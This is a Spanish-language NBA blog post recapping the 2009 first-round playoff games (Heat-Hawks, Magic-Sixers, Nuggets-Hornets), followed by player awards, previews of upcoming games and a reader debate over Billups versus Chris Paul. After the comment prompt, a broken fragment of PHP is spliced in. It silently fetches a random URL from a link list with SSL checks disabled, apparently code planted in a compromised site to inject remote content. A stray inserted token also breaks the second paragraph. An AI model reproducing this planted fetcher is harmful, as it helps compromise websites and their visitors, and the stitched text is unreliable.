Playoffs (22/04/2009): Primer balance

23 de April de 2009 por MagicJohnson32

Por Txusma & MagicJohnson32

Se han disputado ya todos los segundos partidos de las ocho eliminatorias de primera ronda, y el balance es de cinco 1-1 y tres 2-0. Los únicos que todavía no han ganado son Jazz, Hornets y Pistons, y  dudo que nadie arriesgase un solo euro por las posibilidades de remontada de cualquiera de ellos. Vamos con el resumen de los partidos disputados anoche:

Lo dicho. Para ganar a los Hawks, Miami no sólo iba a necesitar una buena versión de Wade, una mucho mejor que en el primer partido de la serie, sino que harían falta versiones al menos decentes de los secundarios. Así, con 33 puntos, 7 asistencias y 5 rebotes de Flash, pero también con 20 puntos de Cook, 19 puntos y 4 tapones de Jermaine, 12 puntos, 7 rebotes y 3 asistencias de Beasley o 10 puntos y 7 rebotes de Haslem, los Heat sacaron un triunfo vital de Atlanta para colocar la serie 1-1. Por el equipo local, el mejor fue… la mascota.

También igualaron su serie los Magic ante los Sixers. Los de Philadelphia jugaron prácticamente con tres hombres, o eso dice el box-score: entre Miller, Iguodala y Young lograron 71 de los 87 puntos del equipo, y rashcleeningún otro jugador anotó más de 5. Orlando no necesitó grandes cosas de Dwight Howard, que estrenó el premio al Mejor Defensor de la temporada con 11 puntos, 10 rebotes y 4 tapones. Bastó con otro gran partido de Courtney Lee, autor de 24 puntos, y otros cinco jugadores con 11 o más puntos cada uno. De todos modos, los Sixers ya habían cumplido su misión: robar un partido en Florida y llevar la serie al Wachovia Center con ventaja de campo.

Los únicos que anoche fueron capaces de poner su eliminatoria 2-0 fueron los Nuggets, de nuevo con un impresionante Chauncey Billups que en los dos partidos ante Chris Paul lleva anotados 67 puntos y, tal vez más impresionante todavía, no ha perdido un solo balón. Los Hornets abusaron de los balones a West, quien pese a finalizar con 21 puntos y 10 rebotes, anduvo muy errático cuando los Nuggets apretaron y se fueron en el marcador. Stojakovic y Butler cumplieron su parte (8 de 10 en triples entre ambos) pero Paul no fue el de sus mejores noches y entre Billups, Melo (22 puntos, 9 asistencias) y JR Smith (15 puntos, 4 rebotes) dieron a los Nuggets su primer 2-0 desde 1985.

billupshornets

PREMIOS

MVP:Tras el horrible partido del primer día, Dwyane Wade volvió para liderar a su equipo a una importantísima victoria en Atlanta. 33 puntos y 7 asistencias incontestables para los Hawks.

Rookie: Con un Dwight Howard más fuera que dentro del partido por problemas de faltas, el jugador que dio un paso al frente para liderar a los Magic no fue Turkoglu, ni Lewis, ni Alston, sino el rookie Courtney Lee, que anotó 24 puntos y robo 3 balones. El último novato que lideró a su equipo en anotación en un partido de Playoffs contra los Sixers fue un tal Earvin Johnson, en el sexto partido de las Finales de 1980. Casi nada.

Sorpresa: Con un papel similar al de Daniel Gibson en el 2007, “me quedo en la esquinita esperando que el mega-crack del equipo me la pase”, el ganador del concurso de triples de este año, Daequan Cook consiguió ayer 20 puntos con de 6 en 9 en tiros de 3. Ya sabe a qué dedicarse.

Decepción: De momento no hay color en el, a priori, igualado duelo Chancey Billups – Chris Paul. El de los Nuggets ha superado en ambos partidos a su contrincante con dos partidos magistrales. Que tome nota CP3.

Mayor esfuerzo en vano: Andre Miller demuestra a cada partido por qué es uno de los bases más fiables y regulares de la competición. Ayer sus 30 puntos y 7 rebotes no bastaron para alzarse con la victoria en Orlando pero sí para hacer sudar al equipo local.

RAZONES PARA TRASNOCHAR

¡Nos movemos! Las eliminatorias se trasladan y reaniman su interés y sus incógnitas.

noahperkins– Celtics @ Bulls (2.00h): Tras tomar el Garden, los Bulls tienen la oportunidad de demostrar que se encuentran en mejor forma que los verdes. Éstos, con el añadido de lesión de Leon Powe, tendrán que apretar los dientes y sacar toda su casta de campeones para salir vivos del United Center.

– San Antonio @ Dallas (2.30h): Los Mavs buscan la manera de parar a un Tony Parker que se fue a los 38 puntos, entrada tras entrada, en el último partido. Si lo consiguen sus oportunidades de ganar se multiplicarán. Es hora también de que Dirk Nowitzki se active.

– Los Angeles @ Utah (4:30h): Es el momento de que los Jazz reaccionen e intenten poner algo de emoción a una eliminatoria que de momento sigue el guión más previsible. Aunque sus mayores problemas se encuentran en defensa, está claro que la vuelta de Okur les supondría un empujoncito extra.

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Segunda clase magistral consecutiva de Billups a Paul… Visto q los Hornets no aspiran a nada este año lo menos q puede hacer CP3 es tomar apuntes 😀
    Y veo a Wade superando la eliminatoria contra los Hawks (y digo Wade, y no los Heat a proposito)

      Citar

  2. TheDeerHunter dice:
    #2

    Increíble lo de Billups… alucinante.
    Uno se las da de seguir mucho la NBA y de conocer a los jugadores y todavía me llevo unos sorpresones del carajo.

    Lo cierto es que en su caso concreto no debería pasarme… no es la primera vez que parte en dos el concepto que yo tenía de él… la primera fue en la debacle de “los 4 fantásticos”.
    Como el buen vino… cada año que pasa más te sorprende, más rico de matices…

      Citar

  3. kantonyo dice:
    #3

    Es un poco oportunista el comentario que voy a decir, y además hay que esperar a que termine la eliminatoria.

    Pero lo que nos está dejando claro estos dos primeros partidos de Denver-NOH es que puede que Chris Paul no sea ahora mismo el mejor base de la NBA. Billups le ha sobrepasado en todas las facetas claramente.

    Por otra parte la eliminatoria Miami-Atlanta ha dado un vuelco impresionante. Despues de la clara superioridad de Atlanta en el primer partido ahora van y pierden el factor campo. No te puedes fiar de estrellas como Wade, siempre tienen algo guardado.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Yo si hubiese el ave inmiscuida en el mundo de la cetreria por decreto ley, hubiese intentado atacar a Josh Smith.

      Citar

  5. TheDeerHunter dice:
    #5

    Yo para nada creo que esto le quite un ápice de prestigio a Chris Paul aún con el baño que se ha llevado de la casa de Billups.
    En los Hornets las cosas han estado mal durante toda la temporada… todas, excepto precísamente Chris Paul… y por lo visto, he leído rumores acerca de muy malos rollos con David West. Sólo les faltaba eso.
    Los momentos en el deporte son decisivos… y si no que se lo digan a Deron Williams con la temporada que ha hecho… ¿o a Nowitzki, por poner otro ejemplo claro??
    Creo que este no es el momento de CP3… y Billups por lo que sea está en la cresta de la ola, y resulta todavía más evidente más gracias a su experiencia e inteligencia pero eso, sin atreverme ni de lejos a menospreciar a Billups no me parece condición suficiente como para concluir que es mejor que CP3.
    De hecho, ya le hubiera gustado a Billups a la edad de CP3 haber demostrado todo lo que ha demostrado Paul.

      Citar

  6. couxe dice:
    #6

    Yo creo que Billups es un crack, y está claramente entre los 5 mejores bases de la nba… Pero también sigo teniendo clarísimo que Paul está a años luz de él… por mucho que en estos dos partidos haya estado por encima, es muy ventajista hablar por solamente 96 minutos de juego en los que ha hecho poco menos que los partidos de su vida…
    Hay que ver también que a uno le ha acompañado el equipo y al otro no…
    Por cierto… Paul lleva 17,5 puntos y 12 asistencias de media en esta serie… casi nada teniendo en cuenta todo lo que le está lloviendo…

      Citar

  7. Rojorob dice:
    #7

    Sí, yo también he leído en el blog de Daimiel que hay mal rollo entre Paul y West, menudo movidón.

      Citar

  8. kantonyo dice:
    #8

    Hombre que está Paul a años de luz de Billups, es una afirmación un poco rotunda….. No se está viendo eso en su enfrentamiento directo, ni ahora ni en la liga regular. A algunos jugadores no les encumbramos al olimpo porque no han ganado nada, y en cambio a otros les perdonamos un 12 de 30 y 9 perdidas en 2 partidos importantísimos de playoffs. Y cuando Paul le gana la partida a Jason Kidd, afirmamos que es mejor que Kidd… no sé no sé…

    La diferencia entre Bryant, Lebron y Wade con Howard y Paul, es que los tres primeros son unos ganadores y los dos restantes todavían tienen mucho que demostrar competitivamente, no sólo números, pero lo dicho todavía no ha terminado la eliminatoria y tiempo tiene Chris para demostrar su valía.

      Citar

  9. javi dice:
    #9

    Paul es un autentico jugadorazo pro el señor Billups tiene un master en esto de jugarsela a vida o muerte como ocurre en PO. Con la edad de Billups veo imposible que mantgenga unos numeros parecdos a los de Paul en la regular season pro los PO son otra historia. Ahi la experiencia cuenta mucho y Billups se ha visto en mil y unas de esta. Ademas en PO los esfuerzos son más concentrados, hay más descansoy el físico no es tan relevante.

    De todas formas Paul no ha dicho la ultima palabra, si le acompañan….

      Citar

  10. couxe dice:
    #10

    Repito, Billups es un crack, y un jugador que me encanta, ya que es uno de los mejores jugadores de equipo que he visto… Pero en esta eliminatoria le han salido prácticamente los 2 partidos de su vida… Sencillamente decir que ha metido un 80% en triples y tirando mucho, cosa que dudo mucho que sea capaz de repetir en un entrenamiento, descansado y sin que le defiendan… Estas cosas entran más dentro de la suerte que del talento… así que medir su nivel por estos dos partidos es un error, ya que ha jugado 120 partidos en playoff que demuestran a las claras que, aunque es muy bueno, ese no es su nivel…
    Y si digo que está a años luz de Paul, es porque éste, haciendo 2 partidos malos y donde supuestamente le han pasado por encima, ha promediado números similares a los que sirvieron a Steve Nash para salir elegido Mvp de la liga regular, y números mejores que los de Billups en liga… Casi nada…

    Por cierto, la aportación de tangibles al equipo en temporada regular, véase valoración, es de 18,6 frente a 30,5… Lo dicho, Billups es muy bueno, pero está a años luz…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>